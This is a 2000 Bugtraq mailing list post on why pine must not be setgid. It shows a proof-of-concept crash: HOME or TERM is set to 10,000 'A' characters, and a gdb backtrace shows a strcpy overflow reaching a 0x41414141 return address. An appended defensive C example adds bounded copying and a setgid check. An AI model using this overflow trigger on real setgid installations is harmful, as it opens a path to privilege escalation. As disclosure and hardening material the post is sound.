Bugtraq mailing list archives

Why pine must never be sgid


From: satan () FASTDIAL NET (Stan Bubrouski)
Date: Fri, 23 Jun 2000 14:33:13 -0000


Pine should never be sgid, yet I see it many times
installed sgid mail on many different UNIX and
Linux systems.  Everybody admits pine should not be
sgid but yet I still see it sgid on some distributions.
Why shouldn't it be sgid?  A reminder using pine 4.21,
which is the latest version to my knowledge as an
example.
[root@king pine]# export HOME=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Segmentation fault (core dumped)
[root@king pine]# gdb pine core 
...
Core was generated by `AAAAA'.
Program terminated with signal 11, Segmentation fault.
...
(gdb) where
#0  0x809e273 in strcpy () at ../sysdeps/generic/strcpy.c:30
#1  0x4eb6 in ?? ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) 

And another:
[root@king pine]# export TERM=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Can't open termcap file; check TERMCAP variable and/or
system manager.
Segmentation fault (core dumped)

There are countless more, I know everybody knows this
already, so why is pine still sgid on some systems?

-Stan Bubrouski
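
Added example, not part of the original post and not pine's code: a bounded replacement for the unbounded strcpy() of an environment variable that the backtrace above points at, plus a check for whether an installed binary carries the setgid bit. PATH_BUF and the function names copy_bounded and file_is_setgid are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#define PATH_BUF 1024   /* assumed size of a fixed path buffer */

/* Pattern the backtrace points at (for contrast, never compiled):
 *     char home[PATH_BUF]; strcpy(home, getenv("HOME"));
 * Bounded form: reject an oversized value instead of truncating it, so
 * a long HOME or TERM is an error rather than a different path.
 * Returns 0 on success, -1 if src is NULL or does not fit in dst. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    const char *end;
    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    end = memchr(src, '\0', dstlen);    /* NUL within dstlen bytes? */
    if (end == NULL)
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Audit check: 1 if path is a regular file with the setgid bit set,
 * 0 if not, -1 if it cannot be examined. */
int file_is_setgid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return S_ISREG(st.st_mode) && (st.st_mode & S_ISGID) ? 1 : 0;
}

int main(int argc, char **argv)
{
    char home[PATH_BUF];
    if (argc > 1)   /* e.g. the path of the installed pine binary */
        printf("%s setgid: %d\n", argv[1], file_is_setgid(argv[1]));
    if (copy_bounded(home, sizeof home, getenv("HOME")) != 0) {
        fputs("HOME unset or too long, refusing to continue\n", stderr);
        return 1;
    }
    printf("HOME=%s\n", home);
    return 0;
}
```

Run with the path of the mail client as the first argument to see whether it is installed setgid; the program exits non-zero when HOME does not fit the buffer.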

